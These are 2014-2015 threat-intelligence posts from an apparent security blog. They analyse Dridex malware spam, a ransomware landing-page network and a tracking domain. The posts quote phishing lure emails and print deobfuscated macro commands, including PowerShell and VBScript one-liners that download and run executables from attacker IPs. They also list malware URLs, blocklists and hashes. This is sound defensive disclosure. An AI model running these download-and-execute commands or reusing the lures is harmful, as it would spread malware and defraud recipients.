Dynamoo's Blog: Hetzner

Showing posts with label Hetzner. Show all posts

Monday 15 June 2015

Malware spam: "Payment Confirmation 29172230" / "reed.co.uk Credit Control [mailto:creditcontrol.rol@reed.co.uk]"

This fake financial spam does not come from Reed, but is instead a simple forgery with a malicious attachment:

From: reed.co.uk Credit Control [mailto:creditcontrol.rol@reed.co.uk]
Sent: Monday, June 15, 2015 11:10 AM
Subject: Payment Confirmation 29172230

Dear Sirs,

Many thanks for your card payment. Please find payment confirmation attached below.

Should you have any queries, please do not hesitate to contact Credit Control Team on 0845 241 9293.

Kind Regards

Credit Control Team
T: 020 7067 4584
F: 020 7067 4628
Email: creditcontrol.rol@reed.co.uk

The only sample I have seen so far has an attachment 29172230_15.06.15.doc [detection rate 3/57] which contains this malicious macro [pastebin] which downloads a component from the following location:

http://www.freewebstuff.be/34/44.exe

This is saved as %TEMP%\ginkan86.exe and has a VirusTotal detection rate of 6/57. There will probably be other download locations, but they should all lead to an identical binary. Automated analysis tools [1] [2] [3] show traffoc to the following IPs:

136.243.14.142 (Hetzner, Germany)
71.14.1.139 (Charter Communications, US)
173.230.130.172 (Linode, US)
94.23.53.23 (OVH, France)
176.99.6.10 (Global Telecommunications Ltd, Russia)

According the this Malwr report, it also drops a Dridex DLL with a detection rate of 18/57.

Recommended blocklist:
136.243.14.142
71.14.1.139
173.230.130.172
94.23.53.23
176.99.6.10

MD5s:
4270bcfa447d96ccb41e486c74dd3d16
724683fa48c498a793d70161d46c811c
ff0f01d7da2ab9a6cf5df80db7cc508a

Monday 1 June 2015

Malware spam: "simonharrington@talktalk.net" / "Subject: Emailing: slide1"

This malware spam arrived in my mailbox in a somewhat mangled state.

From: Simon Harrington [simonharrington@talktalk.net]
Subject: Emailing: slide1
Date: Mon, 01 Jun 2015 19:42:14 +0700

Instead of having an attachment, it has a Base 64 encoded section like this:

0M8R4KGxGuEAAAAAAAAAAAAAAAAAAAAAPgADAP7/CQAGAAAAAAAAAAAAAAACAAAAKgAAAAAA
AAAAEAAALAAAAAQAAAD+////AAAAACkAAAB+AAAA////////////////////////////////

As it is, this email is harmless because all the bad stuff needs decoding. Extracing that section and decoding it gives a file named slide1.doc which contains this malicious macro [pastebin].

This macro downloads a malicious component from:

http://irpanet.com/1/09.exe

Which has a VirusTotal detection rate of 7/56. This Malwr report shows it communicating with the same IPs we saw earlier:

31.186.99.250 (Selectel Network, Russia)
107.170.1.205 (Digital Ocean, US)
146.185.128.226 (Digital Ocean, Netherlands)
144.76.238.214 (Hetzner, Germany)

It also drops the same Dridex DLL we saw earlier, now with a detection rate of 9/56.

Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214

MD5s:
0d02257ec18b92b3c1cf58b8cb6b3d37
cef5555f191735867c34868c346501ad

Incidentally, the email address is a genuine one belonging to a poor chap in Tunbridge Wells (who has nothing to do with this). I bet his mailbox is completely packed with bouncebacks and responses from confused people..

Malware spam: "Uplata po pon 43421" / "Mirjana Prgomet [mirjana@fokus-medical.hr]"

I have no idea what "Uplata po pon" means, but this spam does come with a malicious attachment:

From:    Mirjana Prgomet [mirjana@fokus-medical.hr]
Date:    20 May 2015 at 08:26
Subject:    Uplata po pon 43421

There is no body text, but the only example I saw had an attachment name of report20520159260[1].doc which contained this malicious macro [pastebin] which downloads a malicious executable from:

http://uvnetwork.ca/1/09.exe

This is saved as %TEMP%\eldshrt1.exe and has a VirusTotal detection rate of 3/56. There are probably other download locations with other variants of the document, but the payload should be the same in each case.

Automated analysis tools [1] [2] [3] indicate network traffic to the following locations:

31.186.99.250 (Selectel Network, Russia)
107.170.1.205 (Digital Ocean, US)
146.185.128.226 (Digital Ocean, Netherlands)
144.76.238.214 (Hetzner, Germany)

The Malwr report shows that it drops a Dridex DLL with a detection rate of 5/53.

Recommended blocklist:
31.186.99.250
107.170.1.205
146.185.128.226
144.76.238.214

MD5s:
7008675da5c1b0a6b59834d125fafa45
cef5555f191735867c34868c346501ad

Thursday 21 May 2015

Malware spam: "Invoice# 2976361 Attached" / "PGOMEZ@polyair.co.uk"

So far I have only seen one sample of this. The sender and subject may vary.

From:    PGOMEZ@polyair.co.uk
Date:    21 May 2015 at 08:58
Subject:    Invoice# 2976361 Attached

Invoice Attached - please confirm..

This transmission may contain information that is privileged and strictly confidential. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED.

If you received this transmission in error, please contact the sender and delete the material from any computer immediately. Thank you.

Attached is a malicious file with the no-very-imaginative name 00001.doc [VT 4/56] which contains this malicious macro [pastebin] that downloads a component from the following location:

http://mercury.powerweave.com/72/11.exe

This download site is hosted on 50.97.147.195 (Softlayer Technologies, US / Powerweave Software Services, India), although be aware that other versions of the macro may download from other locations. This file is saved as %TEMP%\ribasiml.exe and has a VirusTotal detection rate of 5/57.

Automated analysis tools [1] [2] [3] [4] show attempted communications with the following IPs:

78.24.218.186 (TheFirst-RU, Russia)
78.46.60.131 (Hetzner, Germany)
87.236.215.151 (OneGbits, Lithuania)
94.242.58.146 (Fishnet Communications, Russia)
130.208.166.65 (The University of Iceland, Iceland)
176.31.28.250 (OVH, France / Bitweb LLC, Russia)
185.12.95.191 (RuWeb, Russia)

The Malwr report shows that it drops a Dridex DLL with a detection rate of 4/57.

Recommended blocklist:
78.46.60.131
87.236.215.151
94.242.58.146
130.208.166.65
176.31.28.250
185.12.95.191
50.97.147.195

MD5s:
f5aee45ce06f6d9f9210ae28545a14c6
56305283d26e66b81afcbcb6f0e9b9b4
015cc26b738d313e5e7aba0c9114670e

Wednesday 22 April 2015

Malware spam: "New document with ID:G27427P from RESTAURANT GROUP PLC was generated"

Made in Russia

I have only seen one sample of this spam so far, it is likely that other variants use different company names:

From:    Tamika Cortez
Date:    22 April 2015 at 14:33
Subject:    New document with ID:G27427P from RESTAURANT GROUP PLC was generated

New report with ID:G27427P was generated by our system. Please follow the link below to get your report.

Download report ID:G27427P

Best regards ,Tamika Cortez
RESTAURANT GROUP PLC

In this case, the link in the email goes to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij?arg1=victim@victimdomain.com&arg2=G27427P.vbs&arg3=RESTAURANT%20GROUP%20PLC

..which includes the victim's email address in the URL. In turn, this redirects to:

http://igruv.tourstogo.us/oalroshimt/fokreeshoo/thovoaksij/files/G27427P.vbs

As the name suggests, this is a VBScript (VT 1/56), in this case it is lightly obfuscated [pastebin] and it initiates a download from:

http://185.91.175.183/sas/evzxce.exe

..which is saved as %TEMP%\jhvwrvcf.exe. The download location is 176.31.28.226 (OVH, France). This file has a VirusTotal detection rate of 6/57. Automated analysis tools [1] [2] [3] show network connections to the following IPs:

144.76.73.3 (Hetzner, Germany)
5.44.216.44 (Camelhost SIA, Latvia)
62.210.214.249 (Iliad Entreprises / Poney Telecom, France)
89.184.66.18 (Invest Ltd, Ukraine)

According to this Malwr report, it drops a Dridex DLL with a detection rate of 3/57.

Recommended blocklist:
176.31.28.226
144.76.73.3
5.44.216.44
62.210.214.249
89.184.66.18

MD5s:
1fc2abec9c754e8cc1726bf40e0b3533
af8ff1ea180d5c45b4bb8c8f17c6cddc
57b54e248588af284871c2076f05651c

Tuesday 7 April 2015

Malware spam: "COMPANY NAME has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]"

This fake legal spam comes with a malicious attachment:

From:    Isiah Mosley [Rosella.e6@customer.7starnet.com]
Date:    7 April 2015 at 14:09
Subject:    Schroders has issued the claim against you and passed for consideration to HM Courts [VM1993LVW]

Schroders,Isiah Mosley

The company name is randomly chose. In the above example the attachment was called VM1993LVW.doc which matched the reference in the subject. The Word document contains a malicious macro [pastebin] which executes the following command:

cmd.exe /c @echo dim gyuFYFGuigddd: Set gyuFYFGuigddd = createobject("Microsoft.XMLHTTP")>gyuFYFGuig.vbs & @echo dim bStrm: Set bStrm = createobject("Adodb.Stream")>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Open "GET", "http://185.39.149.178/aszxmy/image04.gif", False>>gyuFYFGuig.vbs & @echo gyuFYFGuigddd.Send>>gyuFYFGuig.vbs & @echo Set environmentVars = WScript.CreateObject("WScript.Shell").Environment("Process")>>gyuFYFGuig.vbs & @echo tempFolder = environmentVars("TEMP")>>gyuFYFGuig.vbs & @echo Fileopen = tempFolder + "\dfsdfff.exe">>gyuFYFGuig.vbs & @echo with bStrm>>gyuFYFGuig.vbs & @echo .type = 1 >>gyuFYFGuig.vbs & @echo .open>>gyuFYFGuig.vbs & @echo .write gyuFYFGuigddd.responseBody>>gyuFYFGuig.vbs & @echo .savetofile Fileopen, 2 >>gyuFYFGuig.vbs & @echo end with>>gyuFYFGuig.vbs & @echo Set GBIviviu67FUGBK = CreateObject("Shell.Application")>>gyuFYFGuig.vbs & @echo GBIviviu67FUGBK.Open Fileopen>>gyuFYFGuig.vbs & cscript.exe gyuFYFGuig.vbs

I can't be bothered to work out all of the crap with the .vbs which may of may not be importance. Along with an alternate macro, I can see download locations from:

http://185.39.149.178/aszxmy/image04.gif
http://148.251.87.253/aszxmy/image04.gif

For the record, 185.39.149.178 is OOO A.S.R. in Russia and 148.251.87.253 is Hetzner in Germany.

The downloaded .GIF file is definitely not a GIF and is instead an executable that gets saved as %TEMP%\dfsdfff.exe. This has a VirusTotal detecton rate of 2/56. Automated analysis tools [1] [2] [3] show the malware phoning home to:

151.252.48.36 (Vautron Serverhousing, Germany)

According to the Malwr report, it drops a DLL with a detection rate of 2/56 which is most likely a Dridex DLL.

Recommended blocklist:
151.252.48.36
148.251.87.253
185.39.149.178

MD5s:
a4e14c88da9e1a74cd7c26ded99b6a0a
c86a9d012e372d0c3a82b14978ffa1f0

Tuesday 17 February 2015

Malware spam: "Unpaid invoice [ID:9876543210]" drops Dridex

This fake invoice comes with no body text, a random ID: in the subject and a randomly-named malicious Excel attachment

Date: 17 February 2015 at 14:05
Subject: Unpaid invoice [ID:9876543210]

Some example attachment names are:

3356201778.xls
5EABA06572.xls
6F5FE56048.xls
A6AA331555.xls
B2D4C97246.xls
C9E5445852.xls

There are found different variants, all with very low detection rates at VirusTotal [1] [2] [3] [4]. Each one contains a different variety of macros, and unlike previous spam runs, these are individual modules (which frankly makes it no harder to analyse, just harder to put into Pastebin).

When we decrypt the strings in the macro, we see:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://78.129.153.27/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.88.87/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://62.76.43.194/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://46.4.232.206/sdeoefefs/dfssk.cab','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

This combines the recent Powershell trick with a new one. Instead of downloading an EXE file, it downloads and unpacks a CAB file, dfssk.cab which is saved in the %TEMP% folder and then expanded to %TEMP%\JIOiodfhioIH.exe.

These download locations are:
92.63.88.87 (MWTV, Latvia)
78.129.153.27 (iomart, UK)
62.76.43.194 (IT House / Clodo-Cloud, Russia)
46.4.232.206 (Hetzner, Germany / Dmitry Zheltov, Russia)

Automated analysis tools [1] [2] [3] show this POSTing to 92.63.88.97 (MWTV, Latvia), which is definitely worth blocking. Note that one of the download locations for the binary is only a few IPs away at 92.63.88.87.

ThreatExpert also shows attempted network connections to 92.63.88.97 plus:
136.243.237.194 (Hetzner, Germany)
74.208.68.243 (1&1, US)

This Malwr report shows a DLL with MD5 b83b18ffe375fad452c02bdf477864fe which has a VirusTotal detection rate of 3/57.

Recommended blocklist:
92.63.88.97
92.63.88.87
78.129.153.27
62.76.43.194
46.4.232.206
136.243.237.194
74.208.68.243

Wednesday 11 February 2015

Malware spam: "Gail Walker [gail@mblseminars.com]" / "Outstanding Invoice 271741"

This fake invoice does NOT comes from MBL Seminars, they are not sending this spam nor have their systems been compromised. Instead, this is a forgery with a malicious attachment.

From:    Gail Walker [gail@mblseminars.com]
Date:    11 February 2015 at 09:52
Subject:    Outstanding Invoice 271741

Dear Customer

Payment for your Season Ticket was due by 31 January 2015 and has not yet been received. A copy of the invoice is attached.

By way of a reminder, the Season Ticket entitles all members of your organisation to save up to 50% on our public seminars and webinars. Since being a Season Ticket Holder your organisation has saved £728.50.

Please arrange for payment by return by BACS, cheque, or credit card. If payment has been arranged and just not reached us yet then please ignore this email.

If you have any queries, please do not hesitate to contact us.

Regards

Gail Walker

MBL (Seminars) Limited

The Mill House
6 Worsley Road
Worsley
Manchester
United Kingdom
M28 2NL

Tel: +44 (0)161 793 0984
Fax: +44 (0)161 728 8139

So far I have seen two different malicious Word documents (there may be more) with low detection rates [1] [2] containing a different macro each [1] [2]. These download a component from the following locations:

http://www.rapidappliances.co.uk/js/bin.exe
http://translatorswithoutborders.com/js/bin.exe

This file is saves as %TEMP%\dsHHH.exe. It has a VirusTotal detection rate of 10/57. Automated analysis tools [1] [2] [3] show attempted connections to the following IPs:

37.139.47.105 (Comfortel, Russia)
5.39.99.18 (OVH, France / Olga Borodynya, Russia)
136.243.237.218 (Hetzner, Germany)
66.110.179.66 (Microtech Tel, US)
78.140.164.160 (Webazilla, Netherlands / Fozzy Inc, US)
109.234.38.70 (Mchost, Russia)

The Malwr report suggests an attempt to connect to these nonexistent domains:

U1Q6nUgvQfsx4xDu.com
bpmIYYreSPwa7.com
zdMjztmwoDX7cD.com

It also drops a DLL with a detection rate of 3/57 which is probably Dridex.

Recommended blocklist:
37.139.47.105
5.39.99.18
136.243.237.218
66.110.179.66
78.140.164.160
109.234.38.70

For researchers, a copy of the files can be found here. Password is infected.

UPDATE 2015-02-12

Another spam run is under way, with the same text but two different DOC files with zero detections [1] [2] containing one of two malicious macros [1] [2] that download another component from one of the following locations:

http://advancedheattreat.com/js/bin.exe
http://ecinteriordesign.com/js/bin.exe

The payload appears to be the same as the one used in this spam run.

Malware spam: "Your latest e-invoice from.."

This fake invoice spam has a malicious attachment:

From:    Lydia Oneal
Date:    11 February 2015 at 09:14
Subject:    Your latest e-invoice from HSBC HLDGS

Dear Valued Customer,

Please find attached your latest invoice that has been posted to your online account. You’ll be pleased to know that your normal payment terms still apply as detailed on your invoice.

Rest assured, we operate a secure system, so we can confirm that the invoice DOC originates from HSBC HLDGS and is authenticated with a digital signature.

Thank you for using e-invoicing with HSBC HLDGS - the smarter, faster, greener way of processing invoices.

This message and any attachment are confidential and may be privileged or otherwise protected from disclosure.
If you are not the intended recipient, please telephone or email the sender and delete this message and any attachment from your system.
If you are not the intended recipient you must not copy this message or attachment or disclose the contents to any other person.

The company name and the name of the sender varies, but most of the body text remains identical. Some sample subjects are:

Your latest e-invoice from HSBC HLDGS
Your latest e-invoice from MAVEN INCOME & GROWTH VCT 3 PLC
Your latest e-invoice from DDD GROUP PLC
Your latest e-invoice from BAILLIE GIFFORD SHIN NIPPON
Your latest e-invoice from ACAL
Your latest e-invoice from PARAGON DIAMONDS LTD
Your latest e-invoice from TULLETT PREBON PLC
Your latest e-invoice from MERSEY DOCKS & HARBOUR CO
Your latest e-invoice from HOLDERS TECHNOLOGY
Your latest e-invoice from LED INTL HLDGS LTD
Your latest e-invoice from HALOS
Your latest e-invoice from ACORN INCOME FUND
Your latest e-invoice from BLACKROCK WORLD MINING TRUST PLC
Your latest e-invoice from NATURE GROUP PLC
Your latest e-invoice from OPTOS
Your latest e-invoice from MENZIES(JOHN)
Your latest e-invoice from ATLANTIC COAL PLC

The word document is randomly-named, for example 256IFV.doc, 19093WZ.doc and 097DVN.doc. There are three different versions of this malicious document, all with low detection rates [1] [2] [3] containing a slightly different macro in each case [1] [2] [3]. If we deobfuscate the macro, we see some code like this:

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://136.243.237.222:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://185.48.56.62:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://95.163.121.216:8080/hhacz45a/mnnmz.php','%TEMP%\pJIOfdfs.exe');Start-Process '%TEMP%\pJIOfdfs.exe';

The macro is calling Powershell to download and execute code from these locations:

http://136.243.237.222:8080/hhacz45a/mnnmz.php (Hetzer, Germany)
http://185.48.56.62:8080/hhacz45a/mnnmz.php (Sinarohost, Netherlands)
http://95.163.121.216:8080/hhacz45a/mnnmz.php (Digital Networks aka DINETHOSTING, Russia)

The code is downloaded as zzcasr.exe and is then saved as %TEMP%\pJIOfdfs.exe. This binary is of course malicious, with a detection rate of 5/57.

Automated analysis tools [1] [2] [3] [4] [5] show that it attempts to contact the following IPs:

85.143.166.72 (Pirix, Russia)
92.63.88.97 (MWTV, Latvia)
205.185.119.159 (FranTech Solutions, US)
78.129.153.18 (IOmart, UK)
5.14.26.146 (RCS & RDS Residential, Romania)

The malware probably drops a Dridex DLL, although I have not been able to obtain this.

Recommended blocklist:
85.143.166.72
92.63.88.97
205.185.119.159
78.129.153.18
5.14.26.146
136.243.237.222
185.48.56.62
95.163.121.216

(Note, for researchers only a copy of the files can be found here, password=infected)

Thursday 15 January 2015

Malware spam: Payment request of 4176.94 (14 JAN 2015)

This spam comes with a malicious Word document attached:

from:    Alan Case
date:    15 January 2015 at 08:49
subject:    Payment request of 4176.94 (14 JAN 2015)

Dear Sirs,

Sub: Remitance of GBP 4176.94

This is with reference to the above, we request you to kindly remit GBP 4176.94 in favor of our bank account.
For more information on our bank details please refer to the attached document.

Thanking you,
Alan Case Remittance Manager

Other names and job titles seen include:

Alan Case
Melisa Howell
Brooke Barr
Nanette Lloyd
Holly Hartman
Doreen Mclean
Lonnie Boyer
Jessica Richardson
Celeste Singleton
Katie Hahn
Marilyn Barnett
Lois Powell
Donald Yang
Christina Grimes
Keenan Graham
Muriel Prince
Chance Salazar
Francine Nixon

Accounting Team
Senior Accounts
Senior Accounts Payable
Senior Accountant
General Manager
Remittance Manager

The payment amount, name and job title change in each spam, as does the name of the attachment (although this following the format ADV0000XX). There are three malicious Word documents that I have seen, each with a low detection rate at VirusTotal [1] [2] [3] which in turn contain a slightly different macro [1] [2] [3] which attempt to download another component from one of the following locations:

http://95.163.121.71:8080/mopsi/popsi.php
http://95.163.121.72:8080/mopsi/popsi.php
http://136.243.237.204:8080/mopsi/popsi.php

Note the two adjacent IPs of 95.163.121.71 and 95.163.121.72 which belong to Digital Networks CJSC in Russia (aka DINETHOSTING), an IP range of 95.163.64.0/18 that I would recommend you consider blocking. 136.243.237.204 is a Hetzner IP.

The macro downloads a file g08.exe from these locations which is then saved as %TEMP%\UGvdfg.exe. This has a VirusTotal detection rate of 4/57. That VT report also shows the malware attempting to POST to 194.146.136.1:8080 (PE "Filipets Igor Victorovych", Ukraine) which is a well-known bad IP.

The Malwr report is inconclusive, but this exectuable probably drops a Dridex DLL.

Recommended blocklist:
194.146.136.1
95.163.121.71
95.163.121.72
136.243.237.204

UPDATE: the following are Dridex C&C servers which you should also block:
80.237.255.196
85.25.20.107

Monday 1 December 2014

Q:is sync.audtd.com a virus? A:probably not.

One of those things that makes you go "hmmm".. I kept seeing a lot of suspect looking traffic from Russian sites to sync.audtd.com, with strings like this:

http://sync.audtd.com/match/rambler/?uid=0123456789abcdef0123456789abcdef

audtd.com is parked on a Voxility IP of 5.254.113.29. I block large swathes of Voxility IP space because it has bad reputation, but it does have some legitimate customers. The domain registration details are hidden:

Registrant City: Nobby Beach
Registrant State/Province: Queensland
Registrant Postal Code: QLD 4218
Registrant Country: AU
Registrant Phone: +45.36946676
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: contact@privacyprotect.org
Registry Admin ID:

However, sync.audtd.com is hosted on three completely different IPs:

148.251.87.17
148.251.81.131
148.251.81.140

These are hosted by Hetzner in Germany. Not exactly a squeaky clean network either, but they do have a lot of legitimate customers in addition to some evil ones.

Some Googling around and poking about at the very bottom of the search results reveals a possible lead in a Russian-language privacy policy [pdf] on a domain tbighistory.com. There was an English-language version that has since been deleted which read:

Privacy Policy
The Big History is an online technology company, Headquartered in the Russian
Federation. This Privacy policy relates to our technology service that our company provides
to online advertisers, web sites owners and other businesses that use our services.

OUR BUSINESS
We collect non-personally identifiable information regarding offline collected attributes and digital usage patterns of users of mobile devices and computers. In this policy, we refer to this non-personally identifiable information, together with other non-personally identifiable information that we obtain from third parties in order to influence which types of marketing messages and other content are displayed to you, as "Preference Data". We use Preference Data to prepare groups of users, referred to as "segments," based upon their behavior and preferences. We give our customers a limited right to use a user's membership in a segment as a basis for displaying advertisements and other content that are intended to reflect the user's preferences. We also collect non-personally identifiable information for other purposes: for example, to provide aggregate statistics for market research and analytics programs.

WHAT WE COLLECT
Non-PII includes but not limited to your IP host address, the date and time of the ad
request, pages viewed, browser type, the referring URL, Internet Service Provider, and your computer's operating system.

HOW WE COLLECT
We use non-personally identifiable data, including "cookies", "pixel tags," and in some
instances, statistical ID's, to collect and store Preference Data. We do not use flash cookies.
Cookies are small text files that contain a string of characters and uniquely identify a
browser. They are sent to a computer by Web site operators or third parties. Most
browsers are initially set up to accept cookies. You may, however, be able to change your
browser settings to cause your browser to refuse third-party cookies or to indicate when a
third-party cookie is being sent. Check your browser's "Help" files to learn more about
handling cookies on your browser. The Big History cookies will expire after 24 months from the date they are created.

Pixel tags are small strings of code that provide a method for delivering a graphic image on a Web page or other document. Pixel tags allow the operator of the Web page or other
document, or a third party who serves the pixel tag, to set, read, and modify cookies on,
and to transfer other data to, the browser used to view the Web page or other document.
Pixel tags may also be used to obtain information about the computer being used to view
that Web page or other document. The entity that sends the tag can view the IP address of
the computer that the tag is sent to, the time it was sent, the user's operating system and
browser type, and similar information.

INFORMATION SHARING
Collected Non-PII processes into targeting data segments, nevertheless it cannot be broken into segments of users that is small or unique enough for the users to be identified
personally.

All of the information we collect or record is restricted to our offices or designated sites.
Only employees who need the information to perform a specific job are granted access to
our data.

Collected data is processed into targeting data segments and then used by advertisers,
publishers and content providers to enhance users experience. TBH could share collected
and processed data with partners, based on that collected information could be used for
third party advertising purpose.

All of the information we share is transferring via secured protocol excluding non granted access.

OPT OUT
If you’d like to opt-out from having The Big History collect your Non-PII in connection with our Technology, please click here http://sync.audtd.com/optout. When you opt out, we will place an opt-out cookie on your computer. The opt-out cookie tells us not to collect your Non-PII to tailor our online advertisement campaigns. Please note that if you delete, block or otherwise restrict cookies, or if you use a different computer or Internet browser, you may need to renew your opt-out choice.

CHANGES TO OUR POLICY
Our company could revise and change this website policy at any time, so we advise you to
check it periodically to always have up-to-date version.

CONTACT
If you have any questions about this website policy please feel free to contact us by email
info@tbighistory.com
Last Update: 5 September 2014

This site is called "The Big History" and it belongs to a clearly identified Russian company called Auditorius.

So, in fact Auditorius do fully spell out what they are doing in their privacy policy.. but the problem is that it isn't on the audtd.com domain itself, and rather stupidly they are using anonymous WHOIS details (plus some questionable websites). I think the lesson is that if you ARE involved in a legitimate tracking activity, then you must make sure that it is obvious and people can find out what is happening easily. If you don't people will just assume that is a virus.

Monday 28 July 2014

Something evil on 88.198.252.168/29 (Ransomware)

88.198.252.168/29 (Hetzner, Germany) is infected with a whole bunch of ransomware landing pages, like this:

In the past this IP range has been used to host a number of legitimate Austrian sites, but at the moment it appears to be hosting ransomware landing pages exclusively.

The domains in use are a combination of crappy .in domains registered to a series of fake addresses, plus a bunch of subdomains of legitimate domains that have been hijacked. What is interesting about these hijacked domians is that they all use afraid.org as namerservers.

This hijacking at afraid.org is because these particular domain users are using the free afraid.org service which allows anyone to create a subdomain of your domain and point is where they like (explained in this FAQ). The bad news is that this sort of hijacking is a quick way to ruin your domain's reputation. A full list of the subdomains and domain I can find is here [pastebin].

Although this is a Hetzner IP, it is suballocated to a customer who may or may not know anything about this abuse of the IPs in the range:

inetnum:        88.198.252.168 - 88.198.252.175
netname:        ANDY-CONTE
descr:          Andy Conte
country:        DE
admin-c:        DS15036-RIPE
tech-c:         DS15036-RIPE
status:         ASSIGNED PA
mnt-by:         HOS-GUN
source:         RIPE # Filtered

person:         Dmitry Seleznev
address:        Ivana Franko 38-364
address:        121351 Moscow
address:        RUSSIAN FEDERATION
phone:          +79270473970
nic-hdl:        DS15036-RIPE
mnt-by:         HOS-GUN
source:         RIPE # Filtered

Blocking these landing pages will probably not stop a PC from becoming infected with ransomware, but monitoring or blocking the following list may give you some intelligence as to what is happening on your own network.

Recommended blocklist:
88.198.252.168/29
fernandocoelho.net.br
duk66.com
cerone.com.ar
gigliotti.com.ar
clawmap.com
lareferencedentaire.com
izaksuljkic.tk
suulaav.com.np
iseoz.com
friendfamily.id.au
hamiltonewave.com
bandloudi.org
loware.com
private-checker.com
hewmet.eu
mightycoronanation.com
muzzu.com.ar
cuidadonatural.cl
acousauth.com
aybear.com
perthorthodontist.com.au
settleurdebt.com
irisstom.ru
quinha.com.br
tjma.tk
projectsmanaged.com.au
bonata.ro
seguy.cl
deepthots.com
kaki5.web.id
law-enforcement-dtwnourq.in
law-enforcement-dwygrbjz.in
ttx79.com
danielbyrnes.net
universalpeacesociety.org.au
law-enforcement-ebvcbwuw.in
tartsandcrafts.ca
snaggleboards.com
pata1.info
gomeansgo.com
blindsided.us
dlaurentfamily.com
thedrunction.com
bal-tazaar.be
rcs.gr
totten.co
tools-bejo.net
siecon.com.mx
johordt.tk
redstarsclub.su
andrewerdna.co.za
y2014.net
interkatsolutions.com
astrocode.ro
channings.me
utn88.com
hkhotspot.com
muzcgb-ural.ru
mwautomotriz.com
theclubpointbar.ch
jpsa.org.za
tonykohn.tk
takony.hu
grosiragen.com
latanska.com
myipo.pw
study7979.com
weisms.com
armturist.ru
aap73.com
ufaopen.ru
hmh.ro
acupuncturaveterinara.ro
123erp.net
s1.lv
law-enforcement-jjuawtsk.in
gloverhouse.co
comercialmontenegro.cl
ritterservices.net
ancilla.com.au
familiestogether.biz
e-forever.tk
pkp88.com
seppalat.fi
balticexperts.eu
emad.com.ar
iostardata.com
resultadoshumbertoabrao.com.br
ttgrules.com
ket87.com
thejobarena.com
wolf-tec.net
partirviajes.tur.ar
1729.su
pimpthesebums.com
satoshidaily.info
worldslegendshalloffame.com
bahosss.ru
besthub.ro
tsdnasaud.ro
alte.co
cuaca.co.id
smartzbloz.net
at-who.com
perciun.md
dubinkin.me
opoopoiso.com
wtr2.ro
sysmanager.ro
halfluke.info
greenhopetz.com
tucglam.com.ar
diegonunez.com.ar
extex-project.org
moserag.ch
rizahilmi.com
tattomasaj.ro
parabolaresear.ch
dreamstartups.com
morganvenable.com
tourismwelfare.org.np
caribgonewild.net
manausclass.com.br
thatsagreatshadeoflife.com
ymu88.com
cellotelecom.com
katamari.one.pl
excuse.ro
towelie.net
recursosmendoza.com.ar
znd88.com
fkmpp.web.id
niedermaier.li
law-enforcement-tugeyogn.in
bernardifinancial.com
jobvolume.ru
saints-eagle.ru
dextm.ro
rutahostal.cl
institutosinapsis.com.ve
hilinknet.ir
uac55.com
pablodelamaza.cl
szamajuanangel.com.ar
simpsons.com.ar
law-enforcement-vbzcqvfd.in
splashweave.com
megaorganizada.com.br
cliovirtual.cl
kancilja.si
prudentialworld.net
juegosychorradas.com
juancruzweb.com.ar
detectmobile.co.za
mpas.co.za
aapialang.co.id
album.web.tr
g24.ch
whereiszacbunch.com
preguntasconducir.com.ar
iwanacakadut.com
x-alps.com.ar
alexandrearsenaultj.tk
shockata.nl
vipny37.com
angrybirdsonline.com.ar
nursani.web.id
3hstudio.ro
freeebooksdownload.com.ar
getcash4bills.com
tqchoaphung.tk
aksoftware.ru
mol-ck.com
borrowedwine.com
jobvolume.bg
xn--leppnen-8wa.net
npa99.com
paysuper.com
nextclick.ro
scribetown.com
espertiseconsulting.com.ar
kitsune-sama.com.ar
system-check-adnfecjx.in
system-check-awppaaid.in
system-check-bfuljagg.in
system-check-cabhpfuv.in
system-check-dgaaixxq.in
system-check-efbxqcsa.in
system-check-elotpdux.in
system-check-etldvwxb.in
system-check-evkfmgay.in
system-check-faliyfse.in
system-check-fpkbcyot.in
system-check-fshknbfm.in
system-check-fyeltkhn.in
system-check-hiudyjbm.in
system-check-icrkskuc.in
system-check-lrimafgm.in
system-check-ndyihbuc.in
system-check-npgodwaj.in
system-check-nsgycsvo.in
system-check-nzsupdku.in
system-check-pjiosnkb.in
system-check-qufngsmj.in
system-check-rcabswpl.in
system-check-rrhoipny.in
system-check-udkoeulo.in
system-check-ukxmncwd.in
system-check-vbjiikcz.in
system-check-vorxvayt.in
system-check-vqypvqft.in
system-check-wxotxgwd.in
system-check-zagcqrhq.in
system-check-zfwwxmnq.in

Friday 15 November 2013

Malware sites to block 15/11/2013 (Caphaw)

Thanks to a tip to investigate 199.68.199.178 I discovered that the Caphaw network I looked at yesterday is much bigger than I thought. The following IPs and domains can all be regarded as malicious (.SU domains are normally a dead giveaway for evil activity).

